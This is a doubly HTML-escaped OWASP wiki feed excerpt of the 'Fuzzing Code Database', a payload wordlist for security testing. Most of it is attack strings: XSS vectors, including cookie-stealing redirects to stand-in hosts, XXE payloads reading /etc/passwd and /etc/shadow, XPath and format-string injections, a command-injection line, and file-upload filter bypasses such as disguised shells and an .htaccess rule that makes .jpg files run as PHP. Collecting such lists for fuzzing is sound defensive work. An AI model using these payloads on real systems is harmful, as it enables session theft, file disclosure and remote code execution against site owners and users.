&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80061</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80061"/>
				<updated>2010-03-17T20:38:52Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&amp;lt;pre&amp;gt;&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&amp;lt;/pre&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;pre&amp;gt;&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Sometimes you can overwrite .htacces in an upload folder on Apache httpd, try setting .jpg to ex&lt;br /&gt;
ecutable&lt;br /&gt;
# example .htaccess:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&lt;br /&gt;
# Commonly writable directories&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
